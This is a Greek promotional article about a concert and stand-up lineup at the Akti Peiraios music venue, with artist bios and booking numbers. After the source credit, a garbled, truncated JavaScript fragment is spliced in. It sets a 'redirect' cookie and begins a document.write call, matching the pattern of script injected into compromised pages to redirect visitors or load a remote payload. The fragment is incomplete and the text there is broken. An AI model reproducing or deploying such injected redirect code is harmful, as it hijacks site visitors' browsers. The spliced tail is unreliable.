Η αυλαία ανοίγει στις 15/2 στην Ακτή Πειραιώς

Η αυλαία ανοίγει ξανά με ένα άκρως ανανεωμένο σχήμα. Ο λόγος για τους καλλιτέχνες:

Γιάννης Ζουγανέλης, Νίκος Ζιώγαλας, Μπάμπης Στόκας, Λάκης Παπαδόπουλος.

Αναμφισβήτητα το ανανεωμένο σχήμα της Ακτή Πειραιώς θα συζητηθεί περισσότερο από κάθε άλλη φορά. Μπορεί κάποιοι καλλιτέχνες να βρίσκονται ακόμα σε συζητήσεις ή να μην έχουν συμφωνήσει με κάποιο νυχτερινό κέντρο, ωστόσο κάποιοι άλλοι έχουν ήδη δώσει τα χέρια, δηλώνοντας έτοιμοι για μεγάλες επιτυχίες.

Τα τελευταία χρόνια ο Γιάννης Ζουγανέλης εμφανίζεται στην Ακτή Πειραιώς, έχοντας άψογη συνεργασία με τους υπεύθυνους της μουσικής σκηνής. Για τον φετινό χειμώνα εξέφρασαν επιθυμία να σταθούν στο πλευρό καταξιωμένων καλλιτεχνών. Η σεζόν άνοιξε από τον Μιχάλη Χατζηγιάννη, ενώ από 15/2 την σκυτάλη παίρνουν ο Μπάμπης Στόκας και ο Λάκης Παπαδόπουλος.

Ο Μπάμπης Στόκας, γνωστός τραγουδοποιός και ερμηνευτής, τραγουδιστής – στιχουργός αρκετών τραγουδιών των Πυξ Λαξ (1989-2004), ενός από τα πιο δημοφιλή ελληνικά συγκροτήματα της σύγχρονης μουσικής σκηνής, του οποίου αποτελούσε και ιδρυτικό μέλος.

Ο Λάκης Παπαδόπουλος, γνωστός σαν “Λάκης με τα ψηλά ρεβέρ”, έχει δώσει τραγούδια του σε πολλούς Έλληνες καλλιτέχνες ενώ συνεχίζει μέχρι σήμερα ρομαντικός, πραγματικά ροκ, δυναμικός όπως πάντα. Ένας καλλιτέχνης που κάθε ακροατής που σέβεται τον εαυτό του πρέπει να τον παρακολουθήσει ζωντανά.

Ο συνδυασμός των τεσσάρων καλλιτεχνών αποτελεί μοναδικό κομμάτι της διασκέδασης σας. Ο Γιάννης Ζουγανέλης με το μοναδικό του χιούμορ, ο Μπάμπης Στόκας με την εμηνέια και ο Λάκης Παπαδόπουλος με τον παρορμητισμό του συντελούν στο να γίνουν το…απόλυτο σχήμα..στην Ακτή Πειραιώς.

Η Ακτή Πειραιώς είναι η μουσική σκηνή που θα φιλοξενήσει και θα παρουσιάσει το πρόγραμμα των καλλιτεχνών Γιάννη Ζουγανέλη, Νίκο Ζιώγαλα, Μπάμπη Στόκα, Λάκη Παπαδόπουλο. Ένα μαγαζί που αναμορφώνεται ώστε να υποδεχθεί τον κόσμο με τον καλύτερο δυνατό τρόπο. Ένα πρόγραμμα βασισμένο στα τραγούδια, τα θεατρικά σκετς με stand up και interactive στοιχεία, ώστε να ισορροπήσει αρμονικά η μουσική, το τραγούδι, η χαρά.

Στη μουσική σκηνή Ακτή Πειραιώς έχετε την δυνατότητα να κάνετε κράτηση με κανονική τιμή και με φοιτητική προσφορά.

Ακτή Πειραιώς τηλέφωνο κράτησης: 211-7707570 (αστική χρέωση), 6977191746 (whats up).

 

Πηγή: kratisinow.gr
uot;redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply